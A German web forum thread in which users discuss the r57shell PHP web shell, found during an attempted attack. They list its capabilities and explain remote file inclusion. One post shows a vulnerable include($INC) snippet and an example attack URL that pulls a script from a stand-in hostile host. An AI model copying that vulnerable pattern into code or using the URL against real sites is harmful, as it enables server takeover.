r57shell

[robo47]

Ich bin da gerade zufällig darauf gestoßen, weil jemand versucht hat auf meiner Kiste ein paar Lücken von php-apps auszutesten, eins war ein include einer externen gif-datei! die sich als php-script entpuppte, das ganze ist ein recht nettes Script, nennt sich r57shell und bietet alles was der Hacker begehrt, hier mal ein Screenshot, die buttons werden wohl falsch dargestellt und so ein paar Kleinigkeiten, aber egal. Alles LOKAL getestet, nachdem ich das script angeschaut habe, paar sachen auskommentiert habe etc.

Bietet:
Mailversand
Dateibrowser
Dateisuche
Datenbankzugriff (mysql, postgresql, mssql, oracle) [dumps erzeugen etc]
Dateikomprimierung
Auslesen der php.ini
Anzeigen der phpinfo
Dateien packen
PHP-Code direkt ausführen können
Dateien hochladen
Dateien via ftp hochladen oder woandershinladen
Versucht ob er an den gcc kommt und etwas kompilieren kann
Verschiedene Versuche Scripte (perl + c++) auf nem port lauschen zu lassen (scheint ne Art Shell-Ersatz für Zugriff via Telnet oder ähnliches zu sein)

Ich muss sagen, faszinierend was man in ca 58kb alles reinpacken kann, hab ihr auch schonmal solche tollen Einbruchsversuchscripte entdeckt ?

Bild: http://www.robo47.net/public/r57shell/r57shell.png

[dsxs]

Hier ein wenig ausführlicher: http://www.milw0rm.com/video/watch.php?id=29

[WarrenFaith]

Schon interessant das ganze....

[ljungi]

Krass o.O

[CIX88]

Hab mir eben das Script von r57shell angeguckt, ist schon Hart !

[robo47]

Es zeigt eigentlich sehr gut was für potential hinter einer simplen include via http-lücke steckt :) das script auf dem server nutzbar und einem steht quasi alles offen.

[CIX88]

Jo eben, einfach und genial gemacht ...

[Ben]

Es zeigt eigentlich sehr gut was für potential hinter einer simplen include via http-lücke steckt :)

Sorry, was für ein Satz! Vielleicht bin ich zu doof, habe mir das Skript auch nicht angeschaut, aber ... wie meinen?

[robo47]

Es zeigt eigentlich sehr gut was für potential hinter einer simplen include via http-lücke steckt :)

Sorry, was für ein Satz! Vielleicht bin ich zu doof, habe mir das Skript auch nicht angeschaut, aber ... wie meinen?

Es zeigt was man mit einem Script alles machen kann, wenn man jemanden findet der ein Script hat, wo man via http und nem parameter was includen kann, das in Kombination mit register_globals, kann z.b. so aussehen:

script.php

PHP-Code:

<?php
include($INC);
?>

script.php?INC=http://www.boeseseite.de/boesesscript.xyz

mfg
robo47

[Ben]

Ah,

[WarrenFaith]

Mit " wäre das nicht passiert
Es zeigt eigentlich sehr gut was für potential hinter einer simplen "include via http"-lücke steckt :)

[robo47]

Mit " wäre das nicht passiert
Es zeigt eigentlich sehr gut was für potential hinter einer simplen "include via http"-lücke steckt :)

merke ich mir für nächstes mal.

[schifti]

und vorallem Joomla-Components sind davon betroffen natürlich nur mit register.... Ihr glaubt gar nicht, wieviele Usern täglich gehackt werden d.h. arbeiten
Auch sehr beliebt ist die c99.

Cool ist auch, wenn die Angreifer nichts ändern, aber eine Datei mit einem Redirect zu Maleware hinterlassen und die dann im Spam verlinken....

[CIX88]

Hmmm, bin beim Googlen auf eine Seite gekommen, wo die Besitzer vermutlich noch gar nicht wissen, dass sie eine PHP-Datei mit dem r57shell auf ihren Server haben.